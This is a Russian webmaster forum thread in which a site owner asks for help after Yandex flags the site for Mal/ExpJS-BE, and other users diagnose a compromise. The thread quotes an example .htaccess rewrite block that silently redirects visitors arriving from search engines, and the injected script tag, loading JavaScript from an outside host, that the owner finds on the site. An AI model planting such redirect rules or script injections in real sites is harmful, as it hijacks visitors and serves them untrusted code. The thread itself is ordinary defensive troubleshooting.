- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Здравствуйте.
Получил заглушку от яндекса:
Сайт может угрожать безопасности вашего компьютера или мобильного устройства/
Пишет что содержит Mal/ExpJS-BE - что это такое я так и не смог найти.
Скажу сразу что сайт не взламывали, по логам все чисто.
Рекламодатели все белые и работают уже много лет.
Из последнего была добавлена партнерка selectornews.com
В вебмастере яндекса - Результат выборочной проверки:
фигурируют три сайта nseurope.ru nobile-mondi.net nobile-mondi.org
По всем онлайн проверкам включая antivirus-alarm.ru на сайте вирусов нету
Помогите пожалуйста кто может.
Отправьте на перепроверку и всё... Было несколько раз, что яндекс ошибался... Если действительно ничего нет, то всё нормализуется..
еще такое заметил когда открываешь ( в поиске яндекса) свою копию сайта, попадаешь на другой сайт. Как такое может быть?
еще такое заметил когда открываешь ( в поиске яндекса) свою копию сайта, попадаешь на другой сайт. Как такое может быть?
такое может быть когда вирусня на сайте отрабатывает по реферер
Вот информация о вирусе: http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Mal~ExpJS-BE/detailed-analysis.aspx
ТАм наппсано:
Размер 14K
SHA-1 4cca5efb6ac291a891c3e7c9e75203c5ba22f417
MD5 9f612e80cc52fb154030d7b54f44f935
CRC-32 7074252f
Тип файла Язык Разметки Гипертекста
Что значит тип файла Язык Разметки Гипертекста ?
как же мне найти этот код уже все перерыл(( ничего не находит
---------- Добавлено 01.05.2013 в 22:40 ----------
такое может быть когда вирусня на сайте отрабатывает по реферер
почему когда просто заходишь он меня не перекидывает и других пользователей тоже ??
по этим данным ты ничего и не найдешь
сигнатур я там не вижу
Язык Разметки Гипертекста - обычная html страничка
---------- Добавлено 01.05.2013 в 22:42 ----------
вирус может быть зашифрован и тогда он не будет искаться даже по известным сигнатурам
сайт покажи хоть свой
еще такое заметил когда открываешь ( в поиске яндекса) свою копию сайта, попадаешь на другой сайт. Как такое может быть?
Ну вот а говориш сайт не взломан....
Выложи ка сюда хтасес из корня сайта- покажу часть кода где поисковый трафф тырят
Ну вот а говориш сайт не взломан....
Выложи ка сюда хтасес из корня сайта- покажу часть кода где поисковый трафф тырят
врядли это .htaccess судя по названию виря
---------- Добавлено 01.05.2013 в 22:46 ----------
хотя и его проверить не помешает :)
---------- Добавлено 01.05.2013 в 22:47 ----------
почему когда просто заходишь он меня не перекидывает и других пользователей тоже ??
потому что он перекидывает только тех, кто идет с поиска
отправил сайт в личку
потому что он перекидывает только тех, кто идет с поиска
могу поспорить что в хтасесе он найдет примерно такие строчки
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$ http://САЙТ_КУДА_ПЕРЕКИДЫВАЕТ_С_ПОИСКА [L,R]
</IfModule>
<!--U1BFOOTER1Z--><div align="center"><script charset="utf-8" src="http://js.sn00.net/00/66/39.js"></script>
что это ?
---------- Добавлено 01.05.2013 в 23:05 ----------
найди где подключается и удали
потом проверь снова с яндекса
---------- Добавлено 01.05.2013 в 23:05 ----------
могу поспорить что в хтасесе он найдет примерно такие строчки
надо было спорить :)